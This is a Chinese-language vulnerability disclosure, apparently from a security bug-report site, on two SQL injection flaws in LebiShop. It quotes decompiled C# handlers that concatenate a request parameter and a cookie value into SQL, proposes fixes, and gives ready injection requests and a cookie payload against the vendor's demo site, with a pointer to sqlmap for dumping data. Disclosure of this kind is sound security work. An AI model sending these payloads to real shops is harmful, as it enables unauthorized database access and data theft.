### 简要描述: LebiShop商城系统最新版两处SQL注入二 ### 详细说明: LebiShop商城系统最新版两处SQL注入 第一处SQL注入 /ajax/ajax_user.aspx 对应反编译后的文件shop.ajax.ajax_user.UserProduct_Edit方法 ``` // Shop.Ajax.Ajax_user public void UserProduct_Edit() { int t = RequestTool.RequestInt("type", 141); int num = RequestTool.RequestInt("num", 1); int pid = RequestTool.RequestInt("pid", 0); string property = RequestTool.RequestString("property"); string propertypriceids = RequestTool.RequestString("propertypriceids"); int warndays = RequestTool.RequestInt("warndays", 0); if (t != 141 && t != 142 && t != 143 && t != 144) { base.Response.Write("{\"msg\":\"OK\"}"); return; } if ((t == 141 || t == 144) && this.CurrentUser.id == 0) { base.Response.Write(string.Concat(new string[] { "{\"msg\":\"", base.Tag("请先登陆"), "\",\"url\":\"", base.URL("P_Login", ""), "\"}" })); return; } EX_User.UserProduct_Edit(this.CurrentUser, pid, num, t, property, warndays, propertypriceids); ``` 注意这里的propertypriceids通过RequestTool.RequestString方法获取 最后进入了EX_User.UserProduct_Edit函数,跟进 ``` // Shop.Bussiness.EX_User public static void UserProduct_Edit(Lebi_User CurrentUser, int pid, int num, int t, string property, int warndays, string propertypriceids) { string CookieName = "UserProduct" + t; Lebi_Product pro = EX_Product.GetProduct(pid); if (pro == null) { return; } if ((pro.Type_id_ProductType == 321 || pro.Type_id_ProductType == 322) & (DateTime.Now < pro.Time_Start || DateTime.Now > pro.Time_Expired)) { return; } if (CurrentUser.id <= 0) { NameValueCollection nv = CookieTool.GetCookie(CookieName); string key = "p" + pro.id.ToString(); property = HttpUtility.UrlEncode(property); string userproduct = nv.Get(key); if (string.IsNullOrEmpty(userproduct)) { nv.Add(key, num.ToString() + "|" + property); } else { nv.Set(key, num.ToString() + "|" + property); } CookieTool.WriteCookie(CookieName, nv, 1); return; } Lebi_User_Product upro = B_Lebi_User_Product.GetModel(string.Concat(new object[] { "user_id=", CurrentUser.id, " and product_id=", pid, " and 
type_id_UserProductType=", t })); decimal propertyprice = 0m; if (propertypriceids != "") { List<Lebi_ProPerty> ps = B_Lebi_ProPerty.GetList("id in (" + propertypriceids + ")", ""); foreach (Lebi_ProPerty p in ps) { propertyprice += p.Price; } } ``` 如果propertypriceids不为空 ``` B_Lebi_ProPerty.GetList("id in (" + propertypriceids + ")", ""); ``` propertypriceids 被直接拼接进 `in (...)` 条件后传入 B_Lebi_ProPerty.GetList 方法,从请求参数到 SQL 语句的整个过程没有任何过滤或类型校验,导致 SQL 注入。修复上应在拼接前把 propertypriceids 按逗号拆分并逐项用 int.TryParse 校验为整数(或改用参数化查询),校验失败的请求直接拒绝。发送请求: ``` http://demo.lebi.cn/ajax/ajax_user.aspx?__action=UserProduct_Edit&url=/ type=141&propertypriceids=@@version ``` [<img src="https://images.seebug.org/upload/201501/19230421ed5589a9a87800df36aa1b3154c2c19c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19230421ed5589a9a87800df36aa1b3154c2c19c.png) [<img src="https://images.seebug.org/upload/201501/19230437b850f27a66764a8cffe75d43de0d1edd.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19230437b850f27a66764a8cffe75d43de0d1edd.png) 使用SQLmap即可跑出数据 第二处SQL注入 ``` // Shop.Ajax.Ajax_user public void User_Reg() { string verifycode = RequestTool.RequestString("verifycode"); string code = CookieTool.GetCookieString("CheckCodef"); if (code != verifycode) { base.Response.Write("{\"msg\":\"" + base.Tag("验证码错误") + "\"}"); return; } string UserName = RequestTool.RequestString("UserName"); string PWD = RequestTool.RequestString("Password"); int count = B_Lebi_User.Counts("UserName='" + UserName + "'"); if (count > 0) { base.Response.Write("{\"msg\":\"" + base.Tag("用户名已注册") + "\"}"); return; } NameValueCollection nv = CookieTool.GetCookie("parentuser"); int parentuserid = 0; if (!string.IsNullOrEmpty(nv.Get("id"))) { string parentuserid_ = nv.Get("id"); Lebi_User puser = B_Lebi_User.GetModel("id=" + parentuserid_); if (puser != null && this.SYS.IsUsedAgent == "1" && B_API.Check("plugin_agent")) { parentuserid = puser.id; puser.Count_sonuser++; 
B_Lebi_User.Update(puser); } } ``` 注意这里 nv = CookieTool.GetCookie("parentuser"); 从 cookie 中读取 parentuser 的值;如果 nv 中存在 id 这个键,则 parentuserid_ = nv.Get("id"); 最后 parentuserid_ 进入 B_Lebi_User.GetModel("id=" + parentuserid_); 由于 GetModel 中 id 的值完全由 parentuserid_ 拼接而成,既没有做任何处理,也没有单引号保护(即使加上引号也不是可靠的防护),导致 SQL 注入。修复上应在拼接前用 int.TryParse 校验 parentuserid_ 为整数,或改用参数化查询;同一方法中的 B_Lebi_User.Counts("UserName='" + UserName + "'") 也是同样的字符串拼接写法,是否可利用取决于 RequestString 是否对引号做了转义,修复时应一并检查。然后发送请求 ``` http://demo.lebi.cn/ajax/ajax_user.aspx?__Action=User_Reg&url=/ UserName=111111asdf&Password=111111&Password1=111111&Email=111111%40111.com&verifycode=02025&RealName=&Sex=%E7%94%B7&Birthday=&MobilePhone=&Phone=&Fax=&QQ= ``` 设置cookie ``` parentuser=id=1 and id=@@version ``` [<img src="https://images.seebug.org/upload/201501/1923203734ae20c711980edae11d5a3be287824f.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1923203734ae20c711980edae11d5a3be287824f.png) ### 漏洞证明: